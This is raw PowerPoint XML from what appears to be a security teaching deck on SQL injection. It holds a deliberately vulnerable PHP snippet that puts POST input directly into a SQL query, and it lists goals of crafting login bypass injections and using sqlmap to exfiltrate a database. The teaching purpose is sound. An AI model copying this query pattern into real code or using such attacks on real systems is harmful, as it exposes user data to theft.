                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DATABASE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DCCABEE-EDF0-4B70-975C-B20E108DBC3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="154477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25C72BAE-50EA-45B8-9E4D-F503E238370F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="381000"/>
            <a:ext cx="5610960" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ARCHITECTURE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3598DB"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3895012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5160F-278D-4C52-B08B-0DBFBD078C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="-76200"/>
            <a:ext cx="9296400" cy="6477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373A733-1F34-437D-8D46-BFA2987C41FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="268069"/>
            <a:ext cx="4303229" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server-Side PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC808FF9-7529-4FD3-9E22-2C98B1ED386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-381000" y="1143000"/>
            <a:ext cx="10820400" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“name”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“SELECT * FROM users WHERE name=‘$name’;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> // See if user exists in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> // If there are no results, user doesn’t exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>die</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“You need an account!”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541B68B9-42BC-48FE-AF20-9289EB388784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="914400"/>
            <a:ext cx="73152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130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D1E-06B0-2D4E-9990-8CB184A085C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today’s Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7518445-EE58-3D45-8506-776FB55A0314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321972" y="1094704"/>
            <a:ext cx="6878806" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify potential SQL injection points</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manually craft and deliver login bypass injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to exfiltrate the contents of a vulnerable database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1802330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94F20-5679-438E-94B7-D21556C04B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6538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5C0A43E-6B2C-4A63-96DC-FACD61A8BC26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4504679"/>
            <a:ext cx="9144000" cy="600721"/>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CA170A7-2FF1-49D1-A607-F3786E0C13E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2590800"/>
            <a:ext cx="9144000" cy="186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50DF54-167B-487C-A869-5CFBE02B800A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="653854"/>
            <a:ext cx="9144000" cy="1860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80EA3D0-2D4F-4858-B9D3-DA27C9F46BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="370457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FAD2F2-EB85-4C8A-A9AF-73A29236B9C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3811749" y="3694418"/>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31631F-74FC-4EDC-ADCB-D23701ACC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320674" y="0"/>
            <a:ext cx="5470526" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of a Substitution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6DF2F51-F6FA-4611-B10D-2ACF3B8316D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="762000"/>
            <a:ext cx="3312125"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1 User Submission</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51B9E08-B81D-4B2D-94CC-2AE7BC354BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2738735"/>
            <a:ext cx="2151551"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2 PHP Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435C1F6C-D4F5-4FAE-A3D7-7D42698BCE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594252" y="1273497"/>
            <a:ext cx="4596130" cy="1200329"/>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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getUserInfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: www.api.example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name=Jane+Doe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
